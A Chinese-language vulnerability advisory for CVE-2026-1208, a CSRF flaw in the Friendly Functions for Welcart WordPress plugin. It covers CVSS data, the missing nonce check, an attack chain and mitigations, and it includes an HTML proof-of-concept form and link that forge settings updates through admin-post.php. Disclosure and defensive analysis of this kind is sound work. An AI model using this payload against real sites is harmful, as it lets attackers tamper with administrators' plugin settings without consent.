CVE-2026-1208 WordPress Friendly Functions for Welcart插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2026-1208

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Friendly Functions for Welcart plugin for WordPress

漏洞概述

CVE-2026-1208是WordPress插件Friendly Functions for Welcart中的一个跨站请求伪造(CSRF)漏洞。该插件所有版本直至1.2.5版本均受影响。漏洞根源在于插件的设置页面缺少或存在不正确的nonce验证机制。攻击者可以利用此漏洞，通过社会工程学手段诱骗网站管理员点击恶意链接，在管理员不知情的情况下以管理员身份执行伪造的请求，从而更新插件设置。Wordfence安全团队于2026年1月24日披露了此漏洞，CVSS评分为4.3，属于中等严重程度。由于该插件主要用于Welcart电子商务功能扩展，攻击者成功利用此漏洞可能导致插件配置被篡改，进而影响网站的电子商务功能或注入恶意内容。

技术细节

漏洞存在于Friendly Functions for Welcart插件的设置处理代码中，具体位置在ffw_function_settings.php文件的第53行和第58行附近。问题根源是插件在处理设置更新请求时未正确实施WordPress的nonce安全机制。Nonce是WordPress用于验证请求来源和意图的安全令牌，如果缺少正确的nonce验证，攻击者可以构造恶意请求并诱使已登录的管理员执行。攻击者需要创建一个包含恶意参数的特殊链接或网页，当管理员访问时，浏览器会自动携带管理员的认证cookies向目标站点发送请求。由于服务器端缺乏有效的请求来源验证，恶意请求将被执行，导致插件设置被未授权修改。攻击的成功依赖于管理员的交互行为(如点击链接)，但不需要攻击者进行身份认证。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意请求参数的CSRF payload，可以是自动提交的表单或特殊构造的URL链接

STEP 2

步骤2

攻击者通过钓鱼邮件、社交媒体或其他渠道诱骗WordPress网站管理员点击恶意链接或访问包含payload的网页

STEP 3

步骤3

管理员的浏览器在点击后自动向目标网站的admin-post.php发送POST请求，携带管理员的有效认证cookies

STEP 4

步骤4

服务器端因缺少正确的nonce验证，无法识别请求的真实性，直接处理了攻击者构造的设置更新请求

STEP 5

步骤5

插件设置被成功篡改，攻击者实现对插件功能的未授权控制，可能导致网站功能异常或植入恶意内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2026-1208 -->
<!-- Exploit: Update plugin settings without authorization -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - CVE-2026-1208</title>
</head>
<body>
    <h1>CVE-2026-1208 CSRF PoC</h1>
    <p>Click the button below to trigger the forged request:</p>
    
    <!-- Auto-submit form -->
    <form id="exploitForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST">
        <input type="hidden" name="action" value="ffw_save_settings">
        <input type="hidden" name="ffw_setting_key" value="malicious_value">
        <input type="hidden" name="ffw_setting_data" value="injected_content">
        <!-- Additional malicious settings can be added here -->
    </form>
    
    <button type="submit" onclick="document.getElementById('exploitForm').submit();">Click me</button>
    
    <script>
        // Auto-submit after page load (for stealthier attack)
        // window.onload = function() { document.getElementById('exploitForm').submit(); };
    </script>
</body>
</html>

<!-- Alternative: Direct link-based attack -->
<!-- 
https://target-site.com/wp-admin/admin-post.php?
action=ffw_save_settings&
ffw_setting_key=malicious_key&
ffw_setting_data=malicious_data
-->

影响范围

Friendly Functions for Welcart plugin <= 1.2.5 (所有版本)

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时缓解措施：1) 临时禁用Friendly Functions for Welcart插件；2) 加强对管理员的安全教育，提醒不要点击可疑链接；3) 使用Web应用防火墙(WAF)规则阻止异常的admin-post请求；4) 限制管理员访问wp-admin目录的来源IP；5) 监控admin-post.php的异常请求模式。建议尽快升级到插件的最新修复版本以彻底消除该安全风险。